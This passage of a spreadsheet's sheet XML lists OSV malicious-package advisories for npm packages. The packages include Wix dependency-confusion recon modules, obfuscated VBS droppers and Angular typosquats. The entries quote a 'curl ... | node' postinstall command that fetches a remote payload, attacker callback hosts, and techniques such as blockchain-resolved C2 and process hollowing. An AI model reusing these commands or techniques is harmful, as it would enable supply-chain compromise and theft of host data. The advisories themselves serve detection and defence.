Package name and exports (thunderboltRegistry, siteAssetsRegistry, editorRegistry, corvidRegistry, etc.) impersonate internal Wix thunderbolt registry packages, targeting Wix build pipelines via dependency confusion. On require, thunderboltRegistry.js executes `id` and `uname -r` via child_process.execSync and collects hostname, pid, Node.js version, and platform. These values are encoded into subdomains of an attacker-controlled Interactsh/OAST callback domain (davdpb8lhot13kgmnhp0863x9g83mpswq.oast.live) and also POSTed to a webhook.site collector (webhook.site/0492a36c-4d7b-408a-865c-226db25987ba). The exfiltration behavior has no relation to the package's advertised 'flexbox layout utilities' purpose, and the manifest references to static.parastorage.com paths reinforce the Wix-targeted dependency-confusion shape.
</t>
        </is>
      </c>
      <c r="T55" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17521</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B56" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C56" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17522</t>
        </is>
      </c>
      <c r="D56" s="5" t="inlineStr"/>
      <c r="E56" s="5" t="inlineStr"/>
      <c r="F56" s="5" t="inlineStr"/>
      <c r="G56" s="5" t="inlineStr"/>
      <c r="H56" s="5" t="inlineStr"/>
      <c r="I56" s="5" t="inlineStr"/>
      <c r="J56" s="5" t="inlineStr"/>
      <c r="K56" s="5" t="inlineStr"/>
      <c r="L56" s="5" t="inlineStr">
        <is>
          <t>npm:studiocode_eligibility</t>
        </is>
      </c>
      <c r="M56" s="5" t="inlineStr"/>
      <c r="N56" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O56" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P56" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q56" s="5" t="inlineStr"/>
      <c r="R56" s="5" t="inlineStr"/>
      <c r="S56" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (a49b1af8bbf0463bb38d3049e59c28b0dcc8d2e3e5ef54611b4e77bddfdd36dc)
package.json declares a postinstall hook `wscript.exe 4444.vbs` that automatically executes a 765KB VBScript shipped in the tarball on Windows installers. The VBS contains multi-layer obfuscation (XOR-decoded AES S-boxes, SHA-256 constants, a ChaCha20 stream layer, and a large Base64 'ArtifactBundleHX' blob) that decrypts a PowerShell loader, writes it to %TEMP%\pf#####.dat, and invokes it via powershell.exe using process-hollowing-style techniques. The library source (src/index.js) is a small Zod-based email-domain eligibility checker that is unrelated to the VBS payload and serves as cover. The README explicitly claims 'Checks run locally, without network requests' and 'There are no installation scripts', directly contradicting the declared postinstall hook and shipped dropper. Running `npm install studiocode_eligibility` on Windows grants the package author arbitrary code execution on the installer's machine.
</t>
        </is>
      </c>
      <c r="T56" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17522</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B57" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C57" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17523</t>
        </is>
      </c>
      <c r="D57" s="5" t="inlineStr"/>
      <c r="E57" s="5" t="inlineStr"/>
      <c r="F57" s="5" t="inlineStr"/>
      <c r="G57" s="5" t="inlineStr"/>
      <c r="H57" s="5" t="inlineStr"/>
      <c r="I57" s="5" t="inlineStr"/>
      <c r="J57" s="5" t="inlineStr"/>
      <c r="K57" s="5" t="inlineStr"/>
      <c r="L57" s="5" t="inlineStr">
        <is>
          <t>npm:studiocode_tools</t>
        </is>
      </c>
      <c r="M57" s="5" t="inlineStr"/>
      <c r="N57" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O57" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P57" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q57" s="5" t="inlineStr"/>
      <c r="R57" s="5" t="inlineStr"/>
      <c r="S57" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (261d413c0847b530c9a452c209c25e0a7d9123f9b0f20b26d0afcc41a929c74a)
package.json declares a postinstall hook that runs `wscript.exe 4444.vbs`, auto-executing on `npm install` on Windows. The shipped 4444.vbs contains hand-rolled AES and ChaCha20 implementations with XOR-obfuscated S-boxes, SHA-256 round constants XORed with 0x5A5A5A5A, and hundreds of base64 ciphertext fragments (`ArtifactBundleHX`) that are reassembled and decrypted at runtime into a PowerShell loader. The script writes a payload file to `%TEMP%\pfNNNNN.dat` and invokes `powershell.exe` to perform process hollowing of the decrypted payload. The VBS carries cover-story branding as 'Verdant Signals Corp' / 'Device Telemetry Aggregator', and the README falsely states 'There are no installation scripts.' The multi-layer custom cryptography, false branding, and explicit README denial of install scripts are unambiguous indicators of hostile intent rather than legitimate functionality.
</t>
        </is>
      </c>
      <c r="T57" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17523</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B58" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C58" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17524</t>
        </is>
      </c>
      <c r="D58" s="5" t="inlineStr"/>
      <c r="E58" s="5" t="inlineStr"/>
      <c r="F58" s="5" t="inlineStr"/>
      <c r="G58" s="5" t="inlineStr"/>
      <c r="H58" s="5" t="inlineStr"/>
      <c r="I58" s="5" t="inlineStr"/>
      <c r="J58" s="5" t="inlineStr"/>
      <c r="K58" s="5" t="inlineStr"/>
      <c r="L58" s="5" t="inlineStr">
        <is>
          <t>npm:tailwindcss-forms-styles</t>
        </is>
      </c>
      <c r="M58" s="5" t="inlineStr"/>
      <c r="N58" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O58" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P58" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q58" s="5" t="inlineStr"/>
      <c r="R58" s="5" t="inlineStr"/>
      <c r="S58" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (587d9a389f35a8ec2d3ed714c90f7daa43feb6875f4ce2e4280f5ce19569d895)
The package name tailwindcss-forms-styles mimics the legitimate @tailwindcss/forms plugin, and its src/index.js copies that plugin's code verbatim as cover. Above the cover code, a top-level IIFE joins a ~140-element base64 string array, atob()-decodes it, and eval()s the result. The decoded loader queries public Ethereum RPC/Blockscout endpoints for the most recent transaction sent by hardcoded address 0xa322E5f3D311D3080e6f0121063e9aDC2490Ef1a, parses two IPv4 addresses out of the transaction recipient field, downloads an XOR-encoded JavaScript payload from staging URLs of the form http://&lt;ip&gt;:443/0x/cls and http://&lt;ip&gt;:443/0x/ls, and executes it via eval and a detached spawn('node', ['-e',...]) child process. Because the IIFE runs at module load, any consumer that performs require('tailwindcss-forms-styles') triggers remote code execution on the installer, with the command-and-control endpoint resolved dynamically from the blockchain so the C2 can be rotated without changing the package.
</t>
        </is>
      </c>
      <c r="T58" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17524</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B59" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C59" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17525</t>
        </is>
      </c>
      <c r="D59" s="5" t="inlineStr"/>
      <c r="E59" s="5" t="inlineStr"/>
      <c r="F59" s="5" t="inlineStr"/>
      <c r="G59" s="5" t="inlineStr"/>
      <c r="H59" s="5" t="inlineStr"/>
      <c r="I59" s="5" t="inlineStr"/>
      <c r="J59" s="5" t="inlineStr"/>
      <c r="K59" s="5" t="inlineStr"/>
      <c r="L59" s="5" t="inlineStr">
        <is>
          <t>npm:tiny-css-token-parser</t>
        </is>
      </c>
      <c r="M59" s="5" t="inlineStr"/>
      <c r="N59" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O59" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P59" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q59" s="5" t="inlineStr"/>
      <c r="R59" s="5" t="inlineStr"/>
      <c r="S59" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (ee63fae51fceee7c4d3c5051e191e477ca9bb8302f6fc4d3d07f5446951efa0f)
Package is advertised as a CSS token parser but ships thunderboltRegistry.js which runs an IIFE on module load that collects hostname, pid, Node version, platform, and the output of `id` and `uname -r` via child_process.execSync, then exfiltrates them as DNS/HTTP subdomains under an oast.live interact.sh collector and a POST to webhook.site/0492a36c-4d7b-408a-865c-226db25987ba with a `where=internetbrands` tag. The package manifest aliases seven internal Wix Thunderbolt registry module names (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, corvidRegistry, and others) to the same recon module and exports factories under those keys, so any loader that resolves those internal names to this public package will execute the recon payload. The name/description are a cover story; the actual behavior is targeted dependency-confusion reconnaissance against Wix's internetbrands build graph.
</t>
        </is>
      </c>
      <c r="T59" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17525</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B60" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C60" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17526</t>
        </is>
      </c>
      <c r="D60" s="5" t="inlineStr"/>
      <c r="E60" s="5" t="inlineStr"/>
      <c r="F60" s="5" t="inlineStr"/>
      <c r="G60" s="5" t="inlineStr"/>
      <c r="H60" s="5" t="inlineStr"/>
      <c r="I60" s="5" t="inlineStr"/>
      <c r="J60" s="5" t="inlineStr"/>
      <c r="K60" s="5" t="inlineStr"/>
      <c r="L60" s="5" t="inlineStr">
        <is>
          <t>npm:tiny-dom-focus-trap</t>
        </is>
      </c>
      <c r="M60" s="5" t="inlineStr"/>
      <c r="N60" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O60" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P60" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q60" s="5" t="inlineStr"/>
      <c r="R60" s="5" t="inlineStr"/>
      <c r="S60" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (84262096595a1e0ce09bbaa359930cd07cf420cc72545174ddc4f12c60bec962)
The package is advertised as a focus-trap utility but thunderboltRegistry.js runs an IIFE at require time that uses child_process.execSync to run whoami, id, pwd, ifconfig / ip addr, hostname, and to read /etc/hosts, then sends each command's output as query parameters to http://dxpoc.gt.tc/callback.php via fetch. A separate beacon containing Node version, platform, and pid is also posted to the same endpoint. The package additionally impersonates Wix 'thunderbolt' internal registry module names (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry) and references static.parastorage.com manifest URLs, matching a dependency-confusion lure aimed at Wix build environments. Installing or importing this package causes the installer host's identity, network configuration, and /etc/hosts contents to be sent to an attacker-controlled host.
</t>
        </is>
      </c>
      <c r="T60" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17526</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B61" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C61" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17527</t>
        </is>
      </c>
      <c r="D61" s="5" t="inlineStr"/>
      <c r="E61" s="5" t="inlineStr"/>
      <c r="F61" s="5" t="inlineStr"/>
      <c r="G61" s="5" t="inlineStr"/>
      <c r="H61" s="5" t="inlineStr"/>
      <c r="I61" s="5" t="inlineStr"/>
      <c r="J61" s="5" t="inlineStr"/>
      <c r="K61" s="5" t="inlineStr"/>
      <c r="L61" s="5" t="inlineStr">
        <is>
          <t>npm:tiny-focusgroup-helper</t>
        </is>
      </c>
      <c r="M61" s="5" t="inlineStr"/>
      <c r="N61" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O61" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P61" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q61" s="5" t="inlineStr"/>
      <c r="R61" s="5" t="inlineStr"/>
      <c r="S61" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (9c6d210f6c61d0ec49fac4bf487a2d71966b1f3dd59653d8a8fdf12e04f9b306)
tiny-focusgroup-helper@1.0.0 declares itself as a focus-group accessibility helper, but thunderboltRegistry.js runs an IIFE at require time that executes `whoami`, `uname -a`, `ifconfig`/`ip addr`, and reads `/etc/hosts` via child_process, and POSTs/GETs the output as query parameters to the hardcoded plaintext endpoint http://dxpoc.gt.tc/callback.php/ef9ea0e191006f3cc6670720c99c26f3, along with a beacon containing node version, platform, and pid. The dxpoc.gt.tc host is a dynamic-DNS domain unrelated to any legitimate publisher. The package's exported surface (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, corvidRegistry) mirrors internal Wix thunderbolt registry module names and the shipped manifest references static.parastorage.com, consistent with a dependency-confusion/module-impersonation lure targeting Wix build environments.
</t>
        </is>
      </c>
      <c r="T61" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17527</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B62" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C62" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17528</t>
        </is>
      </c>
      <c r="D62" s="5" t="inlineStr"/>
      <c r="E62" s="5" t="inlineStr"/>
      <c r="F62" s="5" t="inlineStr"/>
      <c r="G62" s="5" t="inlineStr"/>
      <c r="H62" s="5" t="inlineStr"/>
      <c r="I62" s="5" t="inlineStr"/>
      <c r="J62" s="5" t="inlineStr"/>
      <c r="K62" s="5" t="inlineStr"/>
      <c r="L62" s="5" t="inlineStr">
        <is>
          <t>npm:tiny-viewport-unit-calc</t>
        </is>
      </c>
      <c r="M62" s="5" t="inlineStr"/>
      <c r="N62" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O62" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P62" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q62" s="5" t="inlineStr"/>
      <c r="R62" s="5" t="inlineStr"/>
      <c r="S62" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (34c221d8f8f0fedded27bfc22763912ffd96e9f3d1b2c08932e054ed418f493e)
The package ships thunderboltRegistry.js, a module that imports Node's child_process primitives and executes `whoami` plus repeated `ping` commands against external hostnames, with POST calls present in the same file. The pattern (whoami capture + repeated ping-based beacons + outbound POSTs) is host-reconnaissance and DNS/ICMP-channel exfiltration shape, directed from the installer's machine to an external endpoint. The behavior is unrelated to the package's advertised purpose (a trivial viewport-unit calculator) and provides no functionality to a consumer; its only effect is to leak host identity information off-host when the module is loaded or invoked.
</t>
        </is>
      </c>
      <c r="T62" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17528</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B63" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C63" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17529</t>
        </is>
      </c>
      <c r="D63" s="5" t="inlineStr"/>
      <c r="E63" s="5" t="inlineStr"/>
      <c r="F63" s="5" t="inlineStr"/>
      <c r="G63" s="5" t="inlineStr"/>
      <c r="H63" s="5" t="inlineStr"/>
      <c r="I63" s="5" t="inlineStr"/>
      <c r="J63" s="5" t="inlineStr"/>
      <c r="K63" s="5" t="inlineStr"/>
      <c r="L63" s="5" t="inlineStr">
        <is>
          <t>npm:ultimate-websocket</t>
        </is>
      </c>
      <c r="M63" s="5" t="inlineStr"/>
      <c r="N63" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O63" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P63" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q63" s="5" t="inlineStr"/>
      <c r="R63" s="5" t="inlineStr"/>
      <c r="S63" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (7574e423b830695141ee6e089006e0c355109e240c69881512806869cfee8114)
package.json declares its only dependency `node-net-pool` as a bare tarball URL pointing at the mutable `main` branch of an unrelated GitHub user (`https://github.com/trktgq0wbre1/node-net-pool/archive/refs/heads/main.tar.gz`), bypassing the npm registry entirely. There is no version pin, no commit SHA, and no integrity hash, so `npm install` fetches whatever bytes that URL currently returns and runs any lifecycle scripts contained in them. The package's own `scripts.postinstall` additionally executes `node -e "...require('node-net-pool')..."`, loading the fetched module at install time so its top-level code also runs on the installer's host. The GitHub account is a throwaway-shaped handle unrelated to the publishing identity, and the shipped tarball contains no real functionality — its only install-time effect is to pull and execute attacker-controlled code from an endpoint whose contents the author can change at any time.
</t>
        </is>
      </c>
      <c r="T63" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17529</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B64" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C64" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17530</t>
        </is>
      </c>
      <c r="D64" s="5" t="inlineStr"/>
      <c r="E64" s="5" t="inlineStr"/>
      <c r="F64" s="5" t="inlineStr"/>
      <c r="G64" s="5" t="inlineStr"/>
      <c r="H64" s="5" t="inlineStr"/>
      <c r="I64" s="5" t="inlineStr"/>
      <c r="J64" s="5" t="inlineStr"/>
      <c r="K64" s="5" t="inlineStr"/>
      <c r="L64" s="5" t="inlineStr">
        <is>
          <t>npm:wcag-color-a11y-helpers</t>
        </is>
      </c>
      <c r="M64" s="5" t="inlineStr"/>
      <c r="N64" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O64" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P64" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q64" s="5" t="inlineStr"/>
      <c r="R64" s="5" t="inlineStr"/>
      <c r="S64" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (8b6e72298f32298d6558f5d52eb7a9d5185b37fe8df14748bf61d6686dde1cb3)
Package is advertised as a WCAG color accessibility helper library but ships thunderboltRegistry.js, an IIFE that on module load executes shell commands (whoami, id, pwd, ifconfig/ip addr, hostname) and transmits the output via HTTP GET and DNS subdomain lookups to the hardcoded Burp Collaborator host gzjsunzfc6i9od2ouhb6dl4a61cs0qof.oastify.com, along with node/platform/pid metadata and an 'rce-poc' beacon string. The package exports factory functions under names mirroring Wix Thunderbolt internal registries (thunderboltRegistry, siteAssetsRegistry, editorRegistry, corvidRegistry, dataBindingRegistry, autoCompleteRegistry, thunderboltBuilderRegistry, thunderboltPreviewRegistry), and ships a registry-manifest.min.json that maps all of those registry names to thunderboltRegistry.js — a dependency-confusion/typosquat shape against Wix's @wix/thunderbolt-* internal registries. Any consumer that resolves one of these names loads and executes the recon/exfiltration payload. The a11y naming is a cover story unrelated to the actual code.
</t>
        </is>
      </c>
      <c r="T64" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17530</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B65" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C65" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17531</t>
        </is>
      </c>
      <c r="D65" s="5" t="inlineStr"/>
      <c r="E65" s="5" t="inlineStr"/>
      <c r="F65" s="5" t="inlineStr"/>
      <c r="G65" s="5" t="inlineStr"/>
      <c r="H65" s="5" t="inlineStr"/>
      <c r="I65" s="5" t="inlineStr"/>
      <c r="J65" s="5" t="inlineStr"/>
      <c r="K65" s="5" t="inlineStr"/>
      <c r="L65" s="5" t="inlineStr">
        <is>
          <t>npm:api-nebula</t>
        </is>
      </c>
      <c r="M65" s="5" t="inlineStr"/>
      <c r="N65" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O65" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P65" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q65" s="5" t="inlineStr"/>
      <c r="R65" s="5" t="inlineStr"/>
      <c r="S65" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (b8232ec7756422686c2bce805fc87821e61a5bd9176cdb2fe7c3190fd2b2eae2)
The package declares `"preinstall": "node preinstall.cjs"` in package.json, and preinstall.cjs is a single-line ~187 KB `Function("pbeIUC", "…")` invocation implementing a custom PRNG plus string-table decoder (numeric constant table, printable-charset string table `UclPgF`, a Bob-Jenkins-style mixer, and a decoder that reconstructs strings via modular arithmetic against `UclPgF.charCodeAt(...)`). The file contains no readable logic — its entire payload is an opaque blob that is decoded and handed to the JS engine during `npm install`. String fragments visible pre-decoding (e.g. `F.kI`, `zehSPTc@y.Ge`, `vCpP.BB/.i+gUAKa`) are placeholder-shaped and only resolve to real hosts/commands after runtime decoding, so the actual install-time behavior and any network destinations are hidden from static inspection. The wrapper module (nebula.js) and package.json declare no native build step, no compilation, and no other legitimate reason for a 187 KB obfuscated preinstall script. This is the canonical obfuscated npm preinstall dropper shape: arbitrary attacker-authored code executes on every installer's machine at `npm install` time, with intent to evade review deliberately concealed by the string-table + Function-eval loader.
</t>
        </is>
      </c>
      <c r="T65" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17531</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B66" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C66" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17532</t>
        </is>
      </c>
      <c r="D66" s="5" t="inlineStr"/>
      <c r="E66" s="5" t="inlineStr"/>
      <c r="F66" s="5" t="inlineStr"/>
      <c r="G66" s="5" t="inlineStr"/>
      <c r="H66" s="5" t="inlineStr"/>
      <c r="I66" s="5" t="inlineStr"/>
      <c r="J66" s="5" t="inlineStr"/>
      <c r="K66" s="5" t="inlineStr"/>
      <c r="L66" s="5" t="inlineStr">
        <is>
          <t>npm:@abgular/core</t>
        </is>
      </c>
      <c r="M66" s="5" t="inlineStr"/>
      <c r="N66" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O66" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P66" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q66" s="5" t="inlineStr"/>
      <c r="R66" s="5" t="inlineStr"/>
      <c r="S66" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (4c4c8470613dc3a49e249f1a9f91bc756bb9b4323c78268b35816f07e78a0a9b)
Package name `@abgular/core` is a single-character transposition of `@angular/core` and copies that package's description, author, and repository metadata. The package.json declares a `postinstall` script that runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, fetching an unpinned, unverified JavaScript payload from a third-party code-hosting service via web.archive.org and piping it directly into `node` during `npm install`. The fetched code executes on the installer's machine with the installer's privileges; its contents are mutable and attacker-controlled. The deceptive package identity ensures developers who mistype `@angular/core` trigger this remote-code execution.
</t>
        </is>
      </c>
      <c r="T66" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17532</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B67" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C67" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17533</t>
        </is>
      </c>
      <c r="D67" s="5" t="inlineStr"/>
      <c r="E67" s="5" t="inlineStr"/>
      <c r="F67" s="5" t="inlineStr"/>
      <c r="G67" s="5" t="inlineStr"/>
      <c r="H67" s="5" t="inlineStr"/>
      <c r="I67" s="5" t="inlineStr"/>
      <c r="J67" s="5" t="inlineStr"/>
      <c r="K67" s="5" t="inlineStr"/>
      <c r="L67" s="5" t="inlineStr">
        <is>
          <t>npm:@anfular/core</t>
        </is>
      </c>
      <c r="M67" s="5" t="inlineStr"/>
      <c r="N67" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O67" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P67" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q67" s="5" t="inlineStr"/>
      <c r="R67" s="5" t="inlineStr"/>
      <c r="S67" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (eefc706854c122c96c898da5d4db285f26e31430f25451e5d1073a31db5e5341)
Package @anfular/core@22.2.1 is a one-character typosquat of @angular/core, with manifest fields impersonating the official Angular package (scope @anfular, description 'Angular - the core framework', author 'angular', repository pointing at github.com/angular/angular). The package.json postinstall script runs 'curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node', downloading an unpinned JavaScript payload from an attacker-controlled gitflic.ru URL (fronted by a web.archive.org wrapper) and piping it directly into node for execution on the installer's machine at npm install time. The fetched code is unverified, unpinned, hosted off any official registry or publisher-matched domain, and executed with the installer's privileges, giving the author arbitrary code execution on every machine that installs the package.
</t>
        </is>
      </c>
      <c r="T67" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17533</t>
        </is>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B68" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C68" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17534</t>
        </is>
      </c>
      <c r="D68" s="5" t="inlineStr"/>
      <c r="E68" s="5" t="inlineStr"/>
      <c r="F68" s="5" t="inlineStr"/>
      <c r="G68" s="5" t="inlineStr"/>
      <c r="H68" s="5" t="inlineStr"/>
      <c r="I68" s="5" t="inlineStr"/>
      <c r="J68" s="5" t="inlineStr"/>
      <c r="K68" s="5" t="inlineStr"/>
      <c r="L68" s="5" t="inlineStr">
        <is>
          <t>npm:@angjlar/core</t>
        </is>
      </c>
      <c r="M68" s="5" t="inlineStr"/>
      <c r="N68" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O68" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P68" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q68" s="5" t="inlineStr"/>
      <c r="R68" s="5" t="inlineStr"/>
      <c r="S68" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
